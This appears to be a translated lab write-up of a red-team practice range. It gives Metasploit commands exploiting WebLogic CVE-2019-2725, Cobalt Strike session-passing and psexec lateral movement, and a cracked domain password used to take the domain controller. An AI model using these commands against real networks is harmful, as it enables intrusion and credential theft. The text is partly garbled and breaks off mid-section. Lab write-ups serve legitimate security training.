Red Sun Actual Combat 2:
Foreword:
VulnStack is a shooting range knowledge platform built by the Red Sun Security Team. The shooting range environment (CMS, vulnerability management, domain management, etc.) are all simulated based on the business habits of domestic enterprises. All environment design ideas come from ATT & The CK red team evaluates the design model and builds the shooting range and designs the problem from the aspects of environment construction, vulnerability exploitation, intranet collection, lateral movement, channel construction, persistent control, trace cleaning, etc. In order to further learn about intranet penetration, this article will study and record the penetration process of an intranet domain environment shooting range provided by the Red Sun Security Team.
Environment preparation:
Environment setup:
kali attack machine, Windows 2008 (web service), Windows 2012 (DC domain control), windows7 (PC).
Network topology diagram:
Here we open the web’s weblogic service and 360, and open the firewalls of other devices.
1. Information collection:
1.Port scan:
Use kali’s nmap to scan. Note that the web here has a firewall. We use the parameter -Pn to bypass the firewall for scanning. Found three useful ports: 80, 445, and 7001. 7001 is the port of the weblogic service. And found that the server information is Windows server 2008 r2-2012.
nmap -sV -Pn 192.168.31.80
We tried visiting http://192.168.31.80 and http://192.168.31:7001, but did not find any useful information.
2. Directory scan:
Let’s try scanning with the tool
a. Use the diamap tool and find nothing.
python dirmap.py -i http://192.168.31.80
b. Using the dirsearch tool, still found nothing.
Outrageous. . .
c. Finally tried Yujian, but there was still no useful information.
3. Vulnerability scan:
We discovered port 7001. We directly tried weblogicScan vulnerability scanning and found two vulnerabilities.
2. Vulnerability Exploitation
1.msfattack
search cve-2019-2725 use 0 set rhosts 192.168.31.80 set lhost 192.168.31.216 set target 1 run
Success geshell.
Turning the perspective to the web, I found that 360 did not report any attack information.
2.msf linkage cs
a. We first enable the cs service on kali, connect the physical machine, and add a listener.
./teamserver 192.168.31.216 123456
b. On msf, we fork and pop the shell to cs.
background use exploit/windows/local/payload_inject set session 1 set lport 6666 set DisablePayloadHandler true run
Set the connection delay
sleep 5
3. Intra-domain information collection
1. Try elevating the rights first, and the escalation is successful.
1. Intranet information collection
Check the target machine information, collect the internal network segment, and find that the internal network is the 10.10.10.0 network segment.
We check the user information in the domain and we find the domain name DC.de1ay.com
We pinged the domain name and found the domain control IP.
2. Grab password
Catch the password of the web, and the successful one is 1qaz@WSX
4. Lateral movement
Remember when we discovered port 445, we used psexec to perform lateral movement within the intranet.
1. Create smb listener
2. Lateral movement
Get domain control!
You can also use commands to log in horizontally here.
rev2self ? make_token de1ay.com\administrator 1qaz@WSX ? jump psexec DC smb
3. Win pc
